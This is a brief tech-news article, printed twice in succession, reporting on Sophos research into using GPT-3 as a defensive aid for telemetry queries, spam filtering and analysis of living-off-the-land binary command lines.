Tech & Startup

ChatGPT can be used as a cybersecurity Co-Pilot: Report

ChatGPT can be used as a cybersecurity Co-Pilot: Sophos
ChatGPT can be used as a cybersecurity Co-Pilot: Sophos

Cybersecurity company Sophos recently released new research on how the cybersecurity industry can leverage GPT-3, the language model behind the now well-known ChatGPT framework, as a co-pilot to help defeat attackers.

The latest report, "GPT for You and Me: Applying AI Language Processing to Cyber Defenses," details projects developed by Sophos X-Ops using GPT-3's large language models to simplify the search for malicious activity in datasets from security software, more accurately filter spam, and speed up analysis of "living off the land" binary (LOLBin) attacks.

Sophos X-Ops researchers have been working on three prototype projects that demonstrate the potential of GPT-3 as an assistant to cybersecurity defenders. All three use a technique called "few-shot learning" to train the AI model with just a few data samples, reducing the need to collect a large volume of pre-classified data.

The first application Sophos tested with the few-shot learning method was a natural language query interface for sifting through malicious activity in security software telemetry; specifically, Sophos tested the model against its endpoint detection and response product. With this interface, defenders can filter through the telemetry with basic English commands, removing the need for defenders to understand SQL or a database's underlying structure.

Sophos also tested a new spam filter using ChatGPT and found that, when compared to other machine learning models for spam filtering, the filter using GPT-3 was significantly more accurate.

Moreover, Sophos researchers were able to create a program to simplify the process for reverse-engineering the command lines of LOLBins. Such reverse-engineering is notoriously difficult, but also critical for understanding LOLBins' behavior—and putting a stop to those types of attacks in the future. 

Comments

ChatGPT can be used as a cybersecurity Co-Pilot: Report

ChatGPT can be used as a cybersecurity Co-Pilot: Sophos
ChatGPT can be used as a cybersecurity Co-Pilot: Sophos

Cybersecurity company Sophos recently released new research on how the cybersecurity industry can leverage GPT-3, the language model behind the now well-known ChatGPT framework, as a co-pilot to help defeat attackers.

The latest report, "GPT for You and Me: Applying AI Language Processing to Cyber Defenses," details projects developed by Sophos X-Ops using GPT-3's large language models to simplify the search for malicious activity in datasets from security software, more accurately filter spam, and speed up analysis of "living off the land" binary (LOLBin) attacks.

Sophos X-Ops researchers have been working on three prototype projects that demonstrate the potential of GPT-3 as an assistant to cybersecurity defenders. All three use a technique called "few-shot learning" to train the AI model with just a few data samples, reducing the need to collect a large volume of pre-classified data.

The first application Sophos tested with the few-shot learning method was a natural language query interface for sifting through malicious activity in security software telemetry; specifically, Sophos tested the model against its endpoint detection and response product. With this interface, defenders can filter through the telemetry with basic English commands, removing the need for defenders to understand SQL or a database's underlying structure.

Sophos also tested a new spam filter using ChatGPT and found that, when compared to other machine learning models for spam filtering, the filter using GPT-3 was significantly more accurate.

Moreover, Sophos researchers were able to create a program to simplify the process for reverse-engineering the command lines of LOLBins. Such reverse-engineering is notoriously difficult, but also critical for understanding LOLBins' behavior—and putting a stop to those types of attacks in the future. 

Comments